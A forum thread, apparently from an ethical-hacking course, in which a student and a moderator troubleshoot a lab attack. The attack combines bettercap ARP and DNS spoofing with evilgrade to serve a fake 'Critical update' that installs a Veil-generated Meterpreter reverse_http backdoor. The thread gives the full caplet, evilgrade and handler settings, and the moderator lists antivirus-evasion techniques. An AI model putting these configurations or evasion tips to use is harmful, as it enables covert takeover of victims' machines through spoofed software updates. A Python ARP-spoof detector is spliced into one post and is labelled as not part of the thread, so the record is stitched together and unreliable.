- This topic has 15 replies, 2 voices, and was last updated 4 years, 3 months ago by Diego Pérez.
July 24, 2020 at 10:07 am #42939 Terrensu (Participant)
Hey,
Sorry to bother you, however when I was working on the content displayed in lecture 16.8, everything was fine until the last part, where Mr Zaid downloads the installer from DAP. I tried to do that on my Windows machine and got a message of '400 bad connection' when I tried to access the website, however other websites did work. I tried to install the DAP installer from another website, which worked, however when I opened it, no meterpreter session was created. How can I fix this?
thanks.
July 24, 2020 at 10:12 am #42940 Terrensu (Participant)
Also, when I try to access other websites an error of HTTPerror('invalid http request form' expected absolute, got relative) would occur.
July 24, 2020 at 10:32 am #42941 Terrensu (Participant)
A similar problem also occurred in 16.7: everything worked fine until I clicked 'update now' in the DAP client, where it would display an error of 'Discovered an error in the component list' and stopped me going any further. Please help.
July 26, 2020 at 3:49 am #43043 Diego Pérez (Moderator)
Hi!
Did your backdoor work if you run it on its own?
Can you show me the following please:
1. Result of ifconfig in Kali.
2. The result of ipconfig in Windows.
3. The configuration for evilgrade.
4. The result of show options before running the multi handler.
5. Bettercap’s version and command used to start it.
6. The contents of arp spoof caplet.
7. The result of: get dns.spoof.*
Let me know.
Diego

July 26, 2020 at 5:28 am #43050 Terrensu (Participant)
Hey Diego:
Thanks for replying, below is the information you're seeking!
IFCONFIG
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe59:fbfa prefixlen 64 scopeid 0x20<link>
ether 08:00:27:59:fb:fa txqueuelen 1000 (Ethernet)
RX packets 6 bytes 900 (900.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 27 bytes 2314 (2.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 24 bytes 1356 (1.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24 bytes 1356 (1.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Configuration for evilgrade:
Payload: go/meterpreter/rev_http selected

Required Options:
Name Value Description
---- ----- -----------
BADMACS FALSE Check for VM based MAC addresses
CLICKTRACK X Require X number of clicks before execution
COMPILE_TO_EXE Y Compile to an executable
CURSORCHECK FALSE Check for mouse movements
DISKSIZE X Check for a minimum number of gigs for hard disk
HOSTNAME X Optional: Required system hostname
INJECT_METHOD Virtual Virtual or Heap
LHOST 10.0.2.15 IP of the Metasploit handler
LPORT 8080 Port of the Metasploit handler
MINPROCS X Minimum number of running processes
PROCCHECK FALSE Check for active VM processes
PROCESSORS 1 Optional: Minimum number of processors
RAMCHECK FALSE Check for at least 3 gigs of RAM
SLEEP 5 Optional: Sleep "Y" seconds, check if accelerated
USERNAME X Optional: The required user account
USERPROMPT FALSE Prompt user prior to injection
UTCCHECK FALSE Check if system uses UTC time

The result of show options in msfconsole:
Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path

Exploit target:
Id Name
-- ----
0 Wildcard Target
bettercap's version and command used to start it:
root@kali:~# bettercap -iface eth0 -caplet /root/spoof.cap
bettercap v2.23 (built for linux amd64 with go1.11.6) [type 'help' for a list of commands]
[00:26:15] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
[00:26:15] [endpoint.new] endpoint 10.0.2.3 detected as 08:00:27:b5:47:34 (PCS Computer Systems GmbH).
[00:26:15] [sys.log] [inf] arp.spoof enabling forwarding
[00:26:15] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
[00:26:15] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.

The contents of the arp spoof caplet:
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.2.7
arp.spoof on
set net.sniff.local true
net.sniff on

I'm a bit confused on how to get dns.spoof?
July 26, 2020 at 5:33 am #43051 Terrensu (Participant)
The IP address of the Windows machine is 10.0.2.7, and the MAC address of the router (10.0.2.1) did change after I ran the bettercap command: the MAC address turned into the same address as the Linux machine.
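The symptom reported in that post, the gateway's MAC suddenly matching another host's MAC, is exactly what a host-side ARP-spoofing check looks for. The following is an added example (not from the thread or from bettercap) that parses `ip neigh` style lines and flags a gateway MAC that is shared with another IP or that differs from a known-good value; the neighbour table and the known-good MAC `52:54:00:12:35:00` are constructed sample data.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of `ip neigh` output as seen from the poisoned host:
# the gateway 10.0.2.1 now answers with the same MAC as 10.0.2.15.
SAMPLE_NEIGH = """\
10.0.2.1 dev eth0 lladdr 08:00:27:59:fb:fa REACHABLE
10.0.2.3 dev eth0 lladdr 08:00:27:b5:47:34 STALE
10.0.2.15 dev eth0 lladdr 08:00:27:59:fb:fa REACHABLE
"""

# "<ip> dev <if> lladdr <mac> ..." ; entries without an lladdr (FAILED/INCOMPLETE) are skipped.
NEIGH_RE = re.compile(r"^(\S+) dev \S+ lladdr ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", re.IGNORECASE)


def parse_neigh(text: str) -> Dict[str, str]:
    """Map IP -> lowercase MAC from neighbour-table lines."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def find_arp_anomalies(table: Dict[str, str], gateway_ip: str,
                       known_gateway_mac: Optional[str] = None) -> List[str]:
    """Return alert strings for a gateway whose MAC changed or is shared with another host."""
    alerts: List[str] = []
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return alerts  # gateway not in the table: nothing to compare against
    if known_gateway_mac and gw_mac != known_gateway_mac.lower():
        alerts.append(f"gateway {gateway_ip} MAC changed: expected {known_gateway_mac.lower()}, saw {gw_mac}")
    # Two IPs resolving to one MAC is the classic poisoning symptom described above.
    for ip, mac in table.items():
        if ip != gateway_ip and mac == gw_mac:
            alerts.append(f"gateway {gateway_ip} shares MAC {gw_mac} with {ip}")
    return alerts


if __name__ == "__main__":
    for alert in find_arp_anomalies(parse_neigh(SAMPLE_NEIGH), "10.0.2.1", "52:54:00:12:35:00"):
        print("ALERT:", alert)
```

On a real host, feed it the live output of `ip neigh` and a gateway MAC recorded while the network was known to be clean.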
July 26, 2020 at 5:38 am #43052 Terrensu (Participant)
And here is the evilgrade configuration:
Name = Download Accelerator
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = ""
VirtualHost = "(update.speedbit.com)"

.-------------+---------------------------------------------------------+------------------------------------------.
| Name        | Default                                                 | Description                              |
+-------------+---------------------------------------------------------+------------------------------------------+
| title       | Critical update                                         | Title name display in the update         |
| failsite    | http://www.speedbit.com/finishupdate.asp?noupdate=&R=0  | Website display when did't finish update |
| enable      | 1                                                       | Status                                   |
| agent       | /var/lib/veil/output/compiled/Pay.exe                   | Agent to inject                          |
| endsite     | speedbit.com                                            | Website display when finish update       |
| description | This critical update fix internal vulnerability         | Description display in the update        |
'-------------+---------------------------------------------------------+------------------------------------------'

July 26, 2020 at 5:53 am #43053 Terrensu (Participant)
After running everything again, the DAP software on my Windows PC was able to detect the update, however when I ran it, no session was created in msfconsole.
July 26, 2020 at 6:14 am #43054 Terrensu (Participant)
HTTPSError('Invalid HTTPS request form ( expected: absolute, got: relatvie);
was the error shown when I tried to access speedbit.com like Mr Zaid did in lecture 16.8. Everything went back to normal once I closed the services on the Kali machine.
July 27, 2020 at 3:51 am #43108 Diego Pérez (Moderator)
Hi!
Did the backdoor work if you run it on its own? Can you share the result of get dns.spoof.* ?
Let me know.
Diego

July 27, 2020 at 5:30 am #43119 Terrensu (Participant)
Hey,
How do I deliver the backdoor to my Windows machine, and how do I get the result of dns.spoof? Is it just the lines of code after I run bettercap?
Sorry to bother you.
July 27, 2020 at 10:36 am #43134 Terrensu (Participant)
Hey Diego,
I was able to send my backdoor to my Windows machine and a meterpreter session was created on my Linux machine, although I found out that Windows didn't allow me to download the backdoor, so I had to manually switch off Windows Defender, which obviously isn't going to happen in a real-life scenario. Any suggestions on how I can fix it? Furthermore, I'm still a bit confused on how to get the results of dns spoof?
Sorry for bothering.
July 28, 2020 at 3:43 am #43176 Diego Pérez (Moderator)
Hi!
For the results of the dns.spoof module just run the command in the bettercap terminal when you have done all your settings:
get dns.spoof.*
Also keep defender disabled. To bypass it:
Basically bypassing AV programs is like a game of cat and mouse, so backdoors might start getting detected at some stage, then the developers release an update, this will allow you to generate undetectable backdoors, then AV programs release an update which will make backdoors detectable ……..
So the main thing is to make sure that Veil or any other tool you’re using to generate the backdoor is up to date.
Here’s a few solutions to try if your backdoor is getting detected:
1. Make sure that you have the latest version of Veil, so do an update before doing use 1.
2. Experiment with different payloads, and experiment with different payload options, and you should be able to bypass it.
3. Try generating a backdoor using TheFatRat or Empire (tutorial link for Empire in the resources of lecture 68).
4. Modify the backdoor code if it's in bat (covered in my social engineering course).
5. Modify backdoor using a hex editor (covered in my social engineering course).
6. Create your own backdoor (covered in my python course).
The best thing to do is look at the last lecture of the course (bonus lecture); it contains all the courses that you can take with this course and a comparison between them.
Also check out this video:
Hope it helps!
Diego

July 29, 2020 at 8:07 am #43240 Terrensu (Participant)
Hey Diego,
When I enter the command get dns.spoof in Kali, it returns an error saying sys.log [err] dns.spoof not found. How can I fix this?
thanks
July 29, 2020 at 8:19 am #43241 Terrensu (Participant)
Hey Diego,
Is it this thing?
dns.spoof.address: '<interface address>'
dns.spoof.all: 'true'
dns.spoof.domains: 'update.speedbit.com'
dns.spoof.hosts: ''

regards,